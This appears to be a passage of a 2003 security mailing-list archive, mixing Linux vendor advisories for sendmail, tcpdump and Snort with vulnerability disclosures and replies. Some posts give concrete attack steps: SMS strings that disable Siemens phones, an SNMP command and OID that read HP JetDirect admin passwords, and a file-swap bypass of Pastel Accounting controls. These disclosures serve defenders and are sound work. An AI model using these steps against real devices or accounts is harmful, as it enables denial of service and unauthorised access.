8.1/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm 2a5ba8809cc1b919e14eda315a6340b7 8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Mandrake Linux 8.1/IA64: b6de1971e7852f1f1255dcf237af3cde ia64/8.1/RPMS/libpcap0-0.7.2-1.1mdk.ia64.rpm de264fee1447af71141926878c93512e ia64/8.1/RPMS/libpcap0-devel-0.7.2-1.1mdk.ia64.rpm 7dc035a9f8e8c14d80b27517ea52597f ia64/8.1/RPMS/tcpdump-3.7.2-1.1mdk.ia64.rpm 2a5ba8809cc1b919e14eda315a6340b7 ia64/8.1/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 ia64/8.1/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Mandrake Linux 8.2: a86ae9c1f7d281382daf0a748b0cc192 8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm 24fe4d16b5e81d825fa6648a84997d84 8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm 84e2ee00e25cb8e54d6efd98e20bd036 8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm 2a5ba8809cc1b919e14eda315a6340b7 8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Mandrake Linux 8.2/PPC: 843c2d96494d413e96dee63c6eb013c8 ppc/8.2/RPMS/libpcap0-0.7.2-1.1mdk.ppc.rpm 112ca43b4c261593d5667dc44c17c700 ppc/8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.ppc.rpm 635d8576811efaee84d2c3608752669d ppc/8.2/RPMS/tcpdump-3.7.2-1.1mdk.ppc.rpm 2a5ba8809cc1b919e14eda315a6340b7 ppc/8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 ppc/8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Mandrake Linux 9.0: 9df719dae2bffe49798156e87e875301 9.0/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm fa7813f3afb1df4b3c00b73a198a53db 9.0/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm b32457602c61c0febcfc2e511373b517 9.0/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm 2a5ba8809cc1b919e14eda315a6340b7 9.0/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 9.0/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Multi Network Firewall 8.2: a86ae9c1f7d281382daf0a748b0cc192 mnf8.2/RPMS/libpcap0-0.7.2-1.1mdk.i586.rpm 24fe4d16b5e81d825fa6648a84997d84 mnf8.2/RPMS/libpcap0-devel-0.7.2-1.1mdk.i586.rpm 84e2ee00e25cb8e54d6efd98e20bd036 mnf8.2/RPMS/tcpdump-3.7.2-1.1mdk.i586.rpm 2a5ba8809cc1b919e14eda315a6340b7 mnf8.2/SRPMS/libpcap-0.7.2-1.1mdk.src.rpm 5129421a6ff6b84a4e4faae0119cfb23 mnf8.2/SRPMS/tcpdump-3.7.2-1.1mdk.src.rpm Single Network Firewall 7.2: ea11a1e2673e0f2da584f08c83ac86a7 snf7.2/RPMS/libpcap-0.7.2-0.1mdk.i586.rpm 972bdf436bdece0078fafcddcaee7c85 snf7.2/RPMS/libpcap-devel-0.7.2-0.1mdk.i586.rpm c96c4ae08580e72334da63a306168c41 snf7.2/RPMS/tcpdump-3.7.2-0.1mdk.i586.rpm 971d86767061c5804ddb3cf7de5ab167 snf7.2/SRPMS/libpcap-0.7.2-0.1mdk.src.rpm 9fb87d3952bf381e5ad552d16baea15b snf7.2/SRPMS/tcpdump-3.7.2-0.1mdk.src.rpm Bug IDs fixed (see https://qa.mandrakesoft.com for more information): To upgrade automatically, use MandrakeUpdate. The verification of md5 checksums and GPG signatures is performed automatically for you. If
Re: Cobalt RaQ server appliances
On Mon, Mar 03, 2003 at 06:26:20PM +0100, Florian Effenberger wrote: does anybody know a security contact at Sun, especially for the Cobalt RaQ server appliances? [EMAIL PROTECTED] is the best place to contact for any and all Sun security issues. For sensitive information, their PGP key is available at http://sunsolve.sun.com/pub-cgi/show.pl?target=security/sec Alan Coopersmith [EMAIL PROTECTED] http://www.CSUA.Berkeley.EDU/~alanc/ aka: [EMAIL PROTECTED] Working for, but definitely not speaking for, Sun Microsystems, Inc.
[blaqhatz] - Pastel Accounting application security issues
See attached. ___ http://www.webmail.co.za the South-African free email service NetWiseGurus.Com Portal - Your Own Internet Business Today! -BEGIN PPP SIGNED MESSAGE- Hash: SH1T --blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-- [EMAIL PROTECTED]@[EMAIL PROTECTED] ADVISORY [EMAIL PROTECTED]@[EMAIL PROTECTED] blaqhatz advisory #1 date: third day of march, in the year of our lord two thousand and three (03/03/03) why today? coz we love 303, oh! oh! oh! http://www.only4jewz.net/efil4zaggin/blaqhatz.advisory.20030303 blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-b l l a ,-.|| || //\\ /|||\ || || //\\ || |/ a q /`-'\ || )) ||// \\ || || || || // \\ || // q | .-/ \-, ||/\ || || || /\ || //| b ( `.___.' ) || )) |||| || || || || || || || ||// b l `. _ .'|| | || || \|||\\ || || || || || /| l a\\a q-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq-blaq PRODUCT: PASTEL ACCOUNTING v6.0-6.12 (confirmed) earlier versions (suspected) 1. BACKGROUND Pastel Accounting is an accounting package widely used by small business entities in countries in Africa, Europe, the Middle and Far East and Australasia. The Pastel product includes a facility for secure access to specific modules within the product. Further information is available @ http://www.pastel.com 2. PROBLEM DESCRIPTION The security system and application controls used by the Pastel product are broken. All user and security information is stored with the file ACCUSER.DAT within the chosen client folder. No data is encrypted with any information within this file, nor is any version/validity checking done against this file. As such, it is possible to replace the ACCUSER.DAT file with one from a different set of accounts, with known usernames and passwords, access and modify the data stored within a specific set of accounts and then restore the original file, thus providing no concrete on by whom the files were modified. In some contexts, it would even be possible to falsify records in an attempt to 'frame' a particular user with changes. Additionally, some preliminary testing on the accuser.dat file displayed an alarming correlation between certain sections of the file and the passwords chosen. For example, given a group of users with chosen passwords , , , , and ABCDEFGH, the following strings were found in the file: , , , , and stuvwxyz. 3. IMPACT Users may not rely on the application level controls implemented by the Pastel Accounting package. As no reliance may be placed on applicaton level controls, auditors must audit around the application. 4. FIX None as of yet. Vendor notified. 5. WHO ARE BLAQHATZ? blaqhatz are: pheer - pheerless - skankyvontrashbag - skankette - nyama_zinto - rod-boi - pheered - minibyte - whoot - pofmuis --blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-ph33r-blaqhatz-- [EMAIL PROTECTED] blaqhatz [EMAIL PROTECTED] mailto:[EMAIL PROTECTED] telling us who and what you are and with a good reason as to why you think you're leet enough to join blaqhatz Why should I join? 1. Everyone else thinks blaqhatz 0wn. 2. blaqhatz have been interviewed by more international legal authorities, seen the inside of more networks and more telco's, been on more television shows, been asked to assist more national intelligence agencies and skewled more people than any other group. **blaqhatz are *the* authority on modern information security** 3. We're nice people. 4. You can get sekret, blaqhatz warez, for free, just for applying. 5. You value security and 0day. You believe in freedom of information. You believe in helping others help themselves. blaqhatz will help you act to make your beliefs a reality. 6. We're only accepting new member applications until the 9th of the 3rd, 2000 3, on a first come, first served basis. All members will need to be approved by the elite blaqhatz board. Big ups, shout outs and serious ruspek go to: ~el8, BoW, #havok, phrack.org, kouriers 4 christ, #hack krew, oldskewl efnet #phreakGER, effkay, arclight, maelstrom, ganja_man, scavenger, mindbinder, raw liquid, tonedef, y0y0y0 and c0. r0qin' 1t iN [EMAIL PROTECTED
Sygate Security Bulletin SS20030221-0001
On 2/21/2003 Sygate posted a Security Response to vuln-dev in response to an advisory posted by Oliver Lavery (xenophi1e) oliver.lavery at sympatico dot com. When first responding to the advisory, it was believed that the vulnerability was reporting that the Sygate Personal Firewall process itself was vulnerable to evasion through the use of CreateRemoteThread(). Sygate Security Bulletin SS20030221-0001 described protections that are in place to prevent this type of evasion in the Sygate Personal Firewall Process itself. After re-examining the vulnerability report and working with the reporter of this vulnerability, Oliver Lavery, it was determined that the report discussed the insertion of code into the address space of other applications. The vulnerability advisory highlights the issue that a firewall restricting network access on a per-application basis does not protect against many types of application behavior, particularly those relating to how the application interacts with the operating system. Sygate Personal Firewall determines which applications are authorized to send and receive traffic based on MD5 hashes (also called fingerprints) of the executables, the .DLLs used by the application and the associated firewall rules. If a malicious program executes code within the address space of an authorized application, that traffic will be allowed by the personal firewall. The scope of the filtering technology within Sygate Personal Firewall does not include monitoring the address space of a given process. The restriction of system and API calls in third-party applications is currently outside of the scope of the network-based functionality of Sygate Personal Firewall. Sygate Personal Firewall employs a variety of technologies to protect a computer, including trojan and network intrusion prevention to provide several layers of network-based protection. Sygate is developing new technologies and will continue to work towards providing the most comprehensive security solutions for our customers. Elisha Riedlinger Product Manager Sygate Technologies, Inc.
SuSE Security Announcement: sendmail (SuSE-SA:2003:013)
-BEGIN PGP SIGNED MESSAGE- __ SuSE Security Announcement Package:sendmail, sendmail-tls Announcement-ID:SuSE-SA:2003:013 Date: Monday, March 3rd 2003, 18:10 MET Affected products: 7.1, 7.2, 7.3, 8.0, 8.1 SuSE Linux Database Server, SuSE Linux Enterprise Server 7, 8 SuSE Linux Firewall on CD/Admin host SuSE Linux Connectivity Server SuSE Linux Office Server Vulnerability Type: local privilege escalation Severity (1-10):7 SuSE default package: yes (until SuSE Linux 8.0 and SLES7) Cross References: http://www.cert.org/advisories/CA-2003-07.html Content of this advisory: 1) security vulnerability resolved: sendmail problem description, discussion, solution and upgrade information 2) pending vulnerabilities, solutions, workarounds: - vnc - w3m 3) standard appendix (further information) __ 1) problem description, brief discussion, solution, upgrade information sendmail is the most widely used mail transport agent (MTA) in the internet. A remotely exploitable buffer overflow has been found in all versions of sendmail that come with SuSE products. These versions include sendmail-8.11 and sendmail-8.12 releases. sendmail is the MTA subsystem that is installed by default on all SuSE products up to and including SuSE Linux 8.0 and the SuSE Linux Enterprise Server 7. The vulnerability is triggered by an email message sent through the sendmail MTA subsystem. In that respect, it is different from commonly known bugs that occur in the context of an open TCP connection. By consequence, the vulnerability also exists if email messages get forwarded over a relay that itself does not run a vulnerable MTA. This specific detail and the wide distribution of sendmail in the internet causes this vulnerability to be considered an error of major severity. The buffer overflow happens on the heap and is known to be exploitable. As of the writing of this announcement, there is no exploit known to exist in the public. Since there is no known workaround for this vulnerability other than using a different MTA, it is strongly recommended to install the update packages as offered at the locations as listed below. We would like to express our gratitude to Eric Allman for notifying SuSE Security of the problem. The vulnerability was discovered by ISS Internet Security Systems, inc. Please download the update package for your distribution and verify its integrity by the methods listed in section 3) of this announcement. Then, install the package using the command rpm -Fhv file.rpm to apply the update. Our maintenance customers are being notified individually. The packages are being offered to install from the maintenance web. SPECIAL INSTALL INSTRUCTIONS: == After performing the update, it is necessary to restart all running instances of sendmail using the command rcsendmail restart as root. Intel i386 Platform: SuSE-8.1: ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.rpm 0f3d981ad8e9be64bc70aff474ce303c ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.rpm afe98a29de75ecd362fad5b02a922856 patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-8.12.6-91.i586.patch.rpm ebd8f188748812aff2830b23de6f34b3 ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/i586/sendmail-devel-8.12.6-91.i586.patch.rpm 09ff6834c369051d165d78f01a44d684 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.1/rpm/src/sendmail-8.12.6-91.src.rpm 50e471df3a90ce4b54b2c5ca3fbc081e SuSE-8.0: ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.rpm 09e0a8ed5b189c7c819d3d38f74a07e1 ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.rpm 72a8c31090299df6b7bd52ea38c31c2b patch rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/n1/sendmail-8.12.3-72.i386.patch.rpm 905b39525ecd0506892b442a204b7aa3 ftp://ftp.suse.com/pub/suse/i386/update/8.0/d4/sendmail-devel-8.12.3-72.i386.patch.rpm a03e4a221c1fb8f2387dc133ada9e604 source rpm(s): ftp://ftp.suse.com/pub/suse/i386/update/8.0/zq1/sendmail-8.12.3-72.src.rpm 6e3106de72c4605d379dc2133adba97b SuSE-7.3: ftp://ftp.suse.com/pub/suse/i386/update/7.3/n1/sendmail-8.11.6-162.i386.rpm
Re: Terminal Emulator Security Issues
On Monday, 03 March 2003, at 17:43:28 (-), Kenn Humborg wrote: What about the CSI character, code 155 (128+27), which DEC terminals (from at least vt220) interpret as a shorthand for ESC [? Eterm is a vt102 emulator, not a vt220 emulator. It does not support the 8-bit version of the CSI. You can test this using: echo -e \23321t You'll get that exact same string in reponse. It may be supported at some point in the future, however, in which case it would be considered a control character just like any other. Michael -- Michael Jennings (a.k.a. KainX) http://www.kainx.org/ [EMAIL PROTECTED] n + 1, Inc., http://www.nplus1.net/ Author, Eterm (www.eterm.org) --- Three six nine, the goose drank wine; the monkey chewed tobacco on the street car line. The line broke, the monkey got choked, and they all went to heaven in a little row boat. -- Nursery Rhyme
Siemens *35 and 45 series phones SMS Danial of Service
Information: The name of vulnerability: Siemens *35-45 DoS SMS Lag To vulnerability are subject: All versions siemens *35 and *45. Official site: www.siemens-mobile.com Kind of vulnerability: Refusal in Service (Denial of Service). Type of vulnerability: Removed / local. Author: subj ([EMAIL PROTECTED]) Date: 02.03.2003 Site: www.dwcgr0up.com Description of vulnerability: There is a local and remote vulnerability and Siemens *35 and *45 series phones. A message of the form %String, where String is on of the languages from the phone language selection menu, will completely disable *35 series phones and result in a 2 minute read delay on *45 series phones. Note that the first letter of language should be capitalized and the quotation marks should be present in the message. The phone will try to read the message and then after 2 minutes return to the main menu. This happens every time the message is sent. After 10-15 messages the battery (NiMH) gets empty. There is a local vulnerability of the same kind. A message of the form %some_word, where some_word is any lower case letter sequence will result in the same effects described above. Vulnerability exploiting: (for remote): We send on phone - victim the message: %Deutsch Or %Polski %Magyar %English %Deutsch (for local): testedersecurity Thanks: DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp l0bster, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, dron (Ivanov Andrey)
RE: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin
Sven, I have been doing some research on the same issue, and it appears that some of the new firmware versions from HP actually fix this vulnerability by replacing the web server with a newer version that doesn't rely on client-side java to verify the password. The issue at hand stems from the fact that the web server in older firmware versions (and some of the newer firmware versions) relied on client-side java to validate the administrator login. This implementation did not encrypt and send the password to the web server to validate, but retrieved the password through snmp (read: plaintext) from the printer and validated the login on the client side. As far as the fixes go, neither of the fixes that you outlined will remedy the situation: 1. If you set the snmp community string to anything other than the default, 'internal' (the default for the JetAdmin Web Server) will still work. The snmp community string of 'internal' is, as far as I have been able to tell, unremovable. Once the snmp community strings have been set to whatever non-default string you want, 'internal' still seems to work. 2. If you do not set a password on the JetAdmin Web Server, anyone can change the settings without authentication. The best solution in this case is to disable the JetAdmin Web Server (if you cannot upgrade the firmware to include the Web Server that isn't written with client-side java) by typing 'ews-config: 0' at the telnet prompt. Once this is done, the password can still be retrieved through the snmp object you mentioned, however no access will be granted (make sure your telnet password is different). If you upgrade the printer firmware, an easy check to see if the new version is vulnerable is to access the web server: if you see the old, mostly-blue colored page, you're still vulnerable. The new web server will still reply to the snmp request, but from what I've seen, it's always null (all 0x00, 0x00,...) One more side note: in your example, the raw ascii string is actually 'ABCDUV' :) Have you talked to HP about this? Geoff -Original Message- From: Sven Pechler [mailto:[EMAIL PROTECTED] Sent: Monday, March 03, 2003 9:26 AM To: [EMAIL PROTECTED] Subject: New HP Jetdirect SNMP password vulnerability when using Web JetAdmin Hello, During an analysis of some HP Jetdirect cards I discovered a security issue that could lead to full access to a networked printer. It looks like the vulnerability described in http://www.securityfocus.com/bid/5331, but the OID is different and you can only obtain one specific password. It is also different from the password vulnerability described in http://www.securityfocus.com/bid/3132 It applies to the following situation: - Any operating system -HP Jetdirect cards JetDirect 300X, (J3263A), JetDirect EX Plus (J2591A), JetDirect 400N (J2552A, J2552B), JetDirect 600N (J3110A, J3111A, J3113A) and older. -The Jetdirect card is being managed from HP Web Jetadmin. -A Web Jetadmin device password had been set on the JetDirect card. (This password must be set from Web Jetadmin and has nothing to do with the Telnet password or the SNMP Set community name) In the above situation the Web Jetadmin device password is readable as plain ASCII tekst from the JetDirect card using SNMP. How to check your printers for this vulnerability: Use an SNMP toolkit to read the following OID from your printer: .iso.org.dod.internet.private.enterprises.hp.nm.system.net-peripheral.net- printer.generalDeviceStatus.gdPasswords (In numerical format: .1.3.6.1.4.1.11.2.3.9.1.1.13.0) An example on a Windows machine, using SNMPUTIL from the Windows Resource kit: C:\snmputil get 131.155.120.118 public .1.3.6.1.4.1.11.2.3.9.1.1.13.0 Variable = .iso.org.dod.internet.private.enterprises.11.2.3.9.1.1.13.0 Value= String 0x410x420x430x440x550x560x3d0x310x300x380 x3b0x000x000x000x00 ..etc... The resulting string reads in ASCII: ABCDEF=108; The Web Jetadmin device password is the word before the '=' sign, in this case: ABCDEF How to protect your printer: 1. Keep the Web Jetadmin device password EMPTY (don't do this on newer cards than the ones mentioned above) 2. Define a 'Set community name' instead Additional means of protection (does not address the SNMP vulnerability): 3. Define a telnet password (do not keep it empty) 4. Create an 'allow list' from the Telnet console to restrict access from defined IP-addresses Sven Pechler University of Technology Eindhoven Faculty of Technology Management
Re: Siemens *35 and 45 series phones SMS Danial of Service
On Mon, Mar 03, 2003 at 01:06:43AM -, subj subj wrote: To vulnerability are subject: All versions siemens *35 and *45. [...] languages from the phone language selection menu, will completely disable *35 series phones and result in a 2 minute read delay on *45 series phones. Note that Please note that this vulnerability isn't as serious as you describe it. At least on my S45, I am able to interrupt this 2 minute delay at any time by pressing the 'hang up' key (but I have to press it for about half a second instead of just hitting it), the message can be read by using 'edit message' instead of 'read message', and it can be deleted without problems. So while this obviously is a bug, it can hardly be called a DoS. Jan pgp0.pgp Description: PGP signature
Re: Security responsible at AOL
A few months ago I submitted a vulnerability about AIM through the appropriate form on their website and to this day I haven't received a response. My advice would be to not bother because they clearly don't care at all. -BludClot - Original Message - From: Michael Schwartzkopff [EMAIL PROTECTED] Date: Sun, 2 Mar 2003 11:58:31 +0100 To: [EMAIL PROTECTED] Subject: Security responsible at AOL Hi, I tried for a long time to contact a security responsible at AOL. I had no chance with the telephone or via web. Is here anybody to tell me whom to contact at AOL. Thanks. -- Dr. Michael Schwartzkopff MultiNET Services GmbH Bretonischer Ring 7 85630 Grasbrunn Tel: (089) 456 911 50 Fax: (089) 456 911 21 mob: (0174) 343 28 75 -- Get your own Hello Kitty email @ www.sanriotown.com Powered by Outblaze
[CLA-2003:571] Conectiva Linux Security Announcement - sendmail
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- CONECTIVA LINUX SECURITY ANNOUNCEMENT - -- PACKAGE : sendmail SUMMARY : Remote vulnerability DATE : 2003-03-03 19:30:00 ID: CLA-2003:571 RELEVANT RELEASES : 6.0, 7.0, 8 - - DESCRIPTION Sendmail[1] is a widely used Mail Transfer Agent (MTA). Researchers at ISS[2] discovered and published[3] a remote vulnerability[4][5] in sendmail that could be used by an attacker to execute arbitrary code as root. This vulnerability can be exploited by creating and sending to a vulnerable sendmail server a carefully crafted email message. This message will trigger the vulnerability and arbitrary commands can be executed with administrative privileges. Please note that non-vulnerable mail servers can be used to pass such messages along so that, for example, even internal sendmail servers could be reached. Starting with Conectiva Linux 7.0, sendmail is no longer the default mail server and has been replaced with Postfix. But sendmail is still shipped in all Conectiva Linux versions. As with many other services, the email service, even if installed, is not started by default in Conectiva Linux. The Common Vulnerabilities and Exposures (CVE) project has assigned the name CAN-2002-1337[7] to this issue. SOLUTION All sendmail users should upgrade their packages immediately. After the upgrade, the sendmail service will be automatically restarted if it was already running. REFERENCES 1.http://www.sendmail.org/ 2.http://www.iss.net/ 3.http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950 4.http://www.cert.org/advisories/CA-2003-07.html 5.http://www.kb.cert.org/vuls/id/398025 6.http://www.sendmail.com/security/ 7.http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1337 UPDATED PACKAGES ftp://atualizacoes.conectiva.com.br/6.0/SRPMS/sendmail-8.11.6-1U60_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-cf-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/6.0/RPMS/sendmail-doc-8.11.6-1U60_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/sendmail-8.11.6-1U70_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-cf-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/7.0/RPMS/sendmail-doc-8.11.6-1U70_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/SRPMS/sendmail-8.11.6-2U80_3cl.src.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-cf-8.11.6-2U80_3cl.i386.rpm ftp://atualizacoes.conectiva.com.br/8/RPMS/sendmail-doc-8.11.6-2U80_3cl.i386.rpm ADDITIONAL INSTRUCTIONS Users of Conectiva Linux version 6.0 or higher may use apt to perform upgrades of RPM packages: - run: apt-get update - after that, execute: apt-get upgrade Detailed instructions reagarding the use of apt and upgrade examples can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en - - All packages are signed with Conectiva's GPG key. The key and instructions on how to import it can be found at http://distro.conectiva.com.br/seguranca/chave/?idioma=en Instructions on how to check the signatures of the RPM packages can be found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en - - All our advisories and generic update instructions can be viewed at http://distro.conectiva.com.br/atualizacoes/?idioma=en - - subscribe: [EMAIL PROTECTED] unsubscribe: [EMAIL PROTECTED] -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE+Y+Nh42jd0JmAcZARAj6TAKDkgvTGscDsT95XBbE/yEO7jjOO9gCgrglI s7NfdorrA+FnQm0Xy67kRSA= =ZySZ -END PGP SIGNATURE-
[Snort-2003-001] Buffer overflow in Snort RPC preprocessor (fwd)
David Mirza Ahmad Symantec sabbe dhamma anatta 0x26005712 8D 9A B1 33 82 3D B3 D0 40 EB AB F0 1E 67 C6 1A 26 00 57 12 -- Forwarded message -- -BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Snort Vulnerability Advisory [SNORT-2003-001] Date: 2003-03-03 Affected Snort Versions: Any version starting with version 1.8 to those before 2003-03-03 1PM/ US/Eastern including 1.9.0 and CVS HEAD (Snort 2.0beta) Synopsis: A buffer overflow has been found in the snort RPC normalization routines by ISS X-Force. This can cause snort to execute arbitrary code embedded within sniffed network packets. This preprocessor is enabled by default. Snort 1.9.1 has been released to resolve this issue. For users using CVS HEAD, a fix has been committed to the source tree. Mitigation: If you are in an environment that can not upgrade snort immediately, comment out the line in your snort.conf that begins: preprocessor rpc_decode and replace it with # preprocessor rpc_decode Details: When the rpc decoder normalizes fragmented RPC records, it incorrectly checks the lengths of what is being normalized against the current packet size. The rpc decoder in Snort 1.9.1 and above contains new alert options that can be used to help detect this attack OptionDefault State alert_fragments INACTIVE alert_large_fragments ACTIVE alert_incomplete ACTIVE alert_multiple_requests ACTIVE The first option will alert on any rpc fragmented record it finds. Large fragments will alert when the reassembled fragment record will exceed the current packet length. The incomplete record will alert when there is a partial record found. The alert_multiple_requests will alert when we find more than one RPC request per packet ( or reassembled packet ). Download Locations: Sourcefire has acquired additional bandwidth and hosting to aid users wishing to upgrade their Snort implementation. Binaries are currently not available, this is a source release only at this time. As new binaries become available they will be added to the site. Source code: http://www.snort.org/dl/snort-1.9.1.tar.gz GPG Signatures: http://www.snort.org/dl/snort-1.9.1.tar.gz.asc CVS HEAD (Snort 2.0beta) has been fixed as well. - -- Martin Roesch - Founder/CTO, Sourcefire Inc. - (410)290-1616 Sourcefire: Snort-based Enterprise Intrusion Detection Infrastructure [EMAIL PROTECTED] - http://www.sourcefire.com Snort: Open Source Network IDS - http://www.snort.org -BEGIN PGP SIGNATURE- Version: GnuPG v1.0.7 (Darwin) iD8DBQE+Y+Rtqj0FAQQ3KOARAurPAJ9qzBQCzOG2xxcn2IBfuOlDMjPhJwCfdgiX M+f1Ccdy03evjCtBT1rq6YQ= =RhwD -END PGP SIGNATURE-